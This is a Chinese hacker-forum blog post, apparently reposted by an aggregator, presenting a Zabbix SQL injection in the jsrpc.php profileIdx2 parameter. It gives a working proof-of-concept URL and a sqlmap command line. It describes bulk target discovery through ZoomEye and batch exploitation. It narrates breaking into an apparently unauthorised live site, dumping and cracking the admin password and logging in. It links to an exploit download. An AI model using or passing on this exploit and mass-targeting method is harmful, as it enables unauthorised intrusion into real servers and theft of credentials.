最新Zabbix,0day漏洞及其利用姿势(附EXP)

Posted 黑白之道

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了最新Zabbix,0day漏洞及其利用姿势(附EXP)相关的知识,希望对你有一定的参考价值。


漏洞概述: 
zabbix是一个开源的企业级性能监控解决方案。 
官方网站: 
zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。


 

漏洞测试: 
在URL后面直接跟上如下内容:


jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=& 
mark_color=1


最新Zabbix,0day漏洞及其利用姿势(附EXP)
 
当出现图中所标识的关键字时,证明漏洞存在。这是在insert上的mysql的报错注入,我们可以自己构造语句进行利用,也可以在SQLMAP中输入详细的参数进行利用。 
 
漏洞利用:


1.通过ZoomEye,搜索关键字zabbix,可以搜索到很多使用zabbix的目标,我们还可以加上关键字country限定搜索国家,city限定城市。 
最新Zabbix,0day漏洞及其利用姿势(附EXP) 
 
2.批量利用 
这里使用独自等待的一个漏洞exp实现批量利用 
最新Zabbix,0day漏洞及其利用姿势(附EXP) 
也可以通过修改session直接登陆 
最新Zabbix,0day漏洞及其利用姿势(附EXP) 
然后把包放行,轻松登陆后台 
 
3.使用SQLMAP跑也可以,我们输入: 
Sqlmap -u “目标连接+PoC” -p “profileIdx2”  --technique E --dbs 
也可以进行注入。 
最新Zabbix,0day漏洞及其利用姿势(附EXP) 

漏洞实例

 
我先利用Zoomeye的语法找到了一个站点,进入后,发现没有问题就是Zabbix~ 
最新Zabbix,0day漏洞及其利用姿势(附EXP) 
哈哈,直接上EXP,看看抛出账号密码 ~ 
最新Zabbix,0day漏洞及其利用姿势(附EXP) 
OK,爆出了账号密码,解密md5 
最新Zabbix,0day漏洞及其利用姿势(附EXP) 
成功爆出来密码为,1q2w3e4r5t,我只想说MDZZ,又是这种密码,没漏洞都能给他跑出来。 
直接利用 
账号:Zabbix 
密码:1q2w3e4r5t 
成功登陆后台,哈哈哈 ~~~


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


http://bbs.77169.com/job.php?action=download&aid=93696


原创,请注明出处,阅读原文可以下载

你会喜欢






亲喜欢吗?记得 点赞| 留言| 分享



----------------------------------

要闻、干货、原创、专业
关注“黑白之道” 微信:i77169
华夏黑客同盟我们坚持,自由,免费,共享!



以上是关于最新Zabbix,0day漏洞及其利用姿势(附EXP)的主要内容,如果未能解决你的问题,请参考以下文章

深入剖析最新IE0day漏洞

Fancy Product Designer插件0day漏洞被利用,用户超过17000个

20155306 白皎 0day漏洞——漏洞的分析与复现

PageAdmin Cms V2.0 getshell 0day

Zabbix最新SQL注射漏洞利用

20155306 白皎 0day漏洞——漏洞利用原理之栈溢出利用